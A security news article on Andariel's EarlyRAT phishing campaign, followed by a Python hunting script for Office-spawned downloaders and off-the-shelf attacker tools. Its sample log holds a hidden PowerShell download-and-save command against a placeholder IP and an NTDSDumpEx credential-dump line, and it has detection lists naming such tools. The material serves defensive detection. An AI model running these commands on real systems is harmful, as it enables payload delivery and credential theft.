North Korean ‘Andariel’ Threat Group Adds New EarlyRAT Malware to Its Phishing Campaign

Published by Shipra Sanganeria on June 30, 2024

According to a recent Kaspersky report, Andariel, a subgroup of the North Korea-linked, state-sponsored Lazarus group, has been observed deploying a previously undocumented malware family named ‘EarlyRAT’.

In mid-2022, Andariel was known for deploying the DTrack malware and the Maui ransomware. To breach target networks it exploited the Log4j vulnerability (Log4Shell, CVE-2021-44228), and over the same period it introduced several new malware families, including YamaBot and MagicRAT, alongside updated versions of NukeSped and DTrack.

Kaspersky discovered EarlyRAT while investigating a separate Andariel campaign. In that campaign the group compromised the victim’s machine with a Log4j exploit, which then downloaded further malware from a command-and-control (C2) server.

EarlyRAT, however, was delivered differently: through phishing documents (Microsoft Word files) whose macros fetched the malware from a server previously tied to the Maui ransomware campaign.

EarlyRAT is a simple remote access trojan: once executed it collects system information and sends it to a C2 server. “In terms of functionality, EarlyRat is very simple. It is capable of executing commands, and that is about the most interesting thing it can do,” the report states. Kaspersky also noted a resemblance between EarlyRAT and MagicRAT: both offer limited functionality, and both are built on an unusual language or framework rather than written from scratch, PureBasic in the case of EarlyRAT and Qt in the case of MagicRAT.

The investigation further found that the commands were being typed by a human operator, and an inexperienced one, judging by the number of mistakes and typing errors. It also identified a tactic new to Andariel: reliance on a set of off-the-shelf, legitimate tools, including PuTTY, 3Proxy, ForkDump, NTDSDumpEx, Powerline and SupRemo.
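The two behaviours described above, a Word macro pulling a payload from a remote server and the subsequent use of legitimate third-party tooling, are both visible in ordinary process-creation telemetry. The following is an added hunting example, not code from the article or from Kaspersky’s report: it runs two simple rules over a handful of constructed log lines. The pipe-delimited log format, the on-disk file names for the tools (the report names products, not binaries; “Powerline” is omitted because its executable name is not given) and the list of downloader-type child processes are all assumptions for illustration.

```python
"""
Added hunting example (not from the article or the Kaspersky report).

Rule 1: an Office application spawning a downloader-type child process,
        rated "high" when the command line carries a URL (macro-based delivery).
Rule 2: execution of the off-the-shelf tools named in the report.

Telemetry format below is a simplified, assumed schema:
    timestamp|host|parent_image|image|command_line
"""
from dataclasses import dataclass
import re

# Product names are from the report; the executable names are assumptions.
OFF_THE_SHELF_TOOLS = {
    "putty.exe": "PuTTY",
    "plink.exe": "PuTTY (plink)",
    "3proxy.exe": "3Proxy",
    "forkdump.exe": "ForkDump",
    "ntdsdumpex.exe": "NTDSDumpEx",
    "supremo.exe": "SupRemo",
}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Assumed set of children that commonly act as stage-two downloaders/launchers.
DOWNLOADER_CHILDREN = {
    "powershell.exe", "cmd.exe", "mshta.exe", "certutil.exe", "curl.exe",
    "bitsadmin.exe", "rundll32.exe", "wscript.exe", "cscript.exe",
}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_line(line: str):
    """Split one telemetry line into fields; return None for malformed input."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmd = parts
    return {"ts": ts, "host": host, "parent": basename(parent),
            "image": basename(image), "cmd": cmd}


def evaluate(event: dict) -> list:
    """Apply both rules to one parsed process-creation event."""
    findings = []
    if event["parent"] in OFFICE_PARENTS and event["image"] in DOWNLOADER_CHILDREN:
        sev = "high" if URL_RE.search(event["cmd"]) else "medium"
        findings.append(Finding(event["host"], "office_spawns_downloader",
                                f"{sev}: {event['parent']} -> {event['image']} {event['cmd']}"))
    tool = OFF_THE_SHELF_TOOLS.get(event["image"])
    if tool:
        findings.append(Finding(event["host"], "off_the_shelf_tool",
                                f"{tool} executed as {event['image']}"))
    return findings


def hunt(lines) -> list:
    """Run the rules over an iterable of raw log lines, skipping malformed ones."""
    out = []
    for line in lines:
        ev = parse_line(line)
        if ev:
            out.extend(evaluate(ev))
    return out


# Constructed sample telemetry for illustration; hosts, users and IPs are fictitious.
SAMPLE_LOG = """\
2024-06-01T09:12:03Z|WS-0412|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\cmd.exe|cmd.exe /c powershell -w hidden -c "iwr http://198.51.100.23/upd.bin -OutFile %TEMP%\\upd.exe"
2024-06-01T09:12:09Z|WS-0412|C:\\Windows\\System32\\cmd.exe|C:\\Users\\a.lee\\AppData\\Local\\Temp\\upd.exe|upd.exe
2024-06-01T09:40:51Z|WS-0412|C:\\Windows\\explorer.exe|C:\\Program Files\\PuTTY\\putty.exe|putty.exe -ssh ops@203.0.113.5
2024-06-01T10:05:30Z|DC-01|C:\\Windows\\System32\\cmd.exe|C:\\Users\\Public\\NTDSDumpEx.exe|NTDSDumpEx.exe -d ntds.dit -o hash.txt
2024-06-01T10:07:00Z|WS-0199|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\splwow64.exe|splwow64.exe 12288
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

On the sample data the macro-driven download on WS-0412 fires at high severity, while Word launching the print spooler helper on WS-0199 does not, because splwow64.exe is not a downloader-type child. The tool rule is deliberately noisy: PuTTY on a workstation is often legitimate, so in practice you would baseline it per host or user, whereas NTDSDumpEx running on a domain controller warrants immediate attention regardless of who ran it.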

Because Lazarus and its subgroups engage not only in espionage-style APT operations but also in plain cybercrime such as ransomware deployment, it is worth studying both the complex and the simple malware this group introduces. By focusing on TTPs (tactics, techniques, and procedures), targeted organizations can pre-empt attacks and deploy “proactive countermeasures to prevent incidents from happening,” Kaspersky noted.
